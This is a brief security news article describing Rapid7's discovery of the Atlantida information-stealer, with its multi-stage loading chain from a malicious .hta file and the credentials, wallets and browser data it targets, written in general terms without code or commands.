Image: Rapid7
Recently, security researchers from Rapid7 detected a new malware, called Atlantida. This sophisticated stealer malware lures users into downloading a malicious file from a compromised website, utilizing advanced evasion techniques like reflective loading and injection before activation. Its primary objective is to pilfer a vast array of sensitive information, including login credentials for popular applications like Telegram and Steam, data from offline and browser extension cryptocurrency wallets, and even capturing the victim’s screen and hardware data.
The attack begins with the victim manually executing a deceptive .hta file downloaded from a compromised website. The file contains a Visual Basic Script that decrypts and executes a base64 encoded string, setting off a chain of stealthy operations. The malware employs a three-stage loading process, starting with a PowerShell script that downloads and executes further malicious scripts in memory. This includes a .NET downloader, which then retrieves a Donut injector – a tool designed for in-memory execution of various file types.
Ultimately, the Atlantida stealer, named for a string found in its executable, is loaded. This stealer is not only adept at capturing entire screen contents but also targets specific data sources. It searches for files related to Filezilla, an open-source FTP software, and looks for offline cryptocurrency wallets, harvesting data from these sources. Additionally, it collects detailed hardware information from the victim’s device and targets specific directories for further data extraction.
A unique aspect of Atlantida is its focus on certain web browsers – Google Chrome, Mozilla Firefox, and Microsoft Edge – and its ability to steal information from Chrome-based browser extensions. The stolen data is meticulously compiled, compressed, and then transmitted to a command and control server.
Atlantida’s sophisticated multi-stage attack, targeted data theft, and evasion techniques mark it as a significant threat in the realm of cybersecurity, requiring vigilant awareness and advanced protective measures.
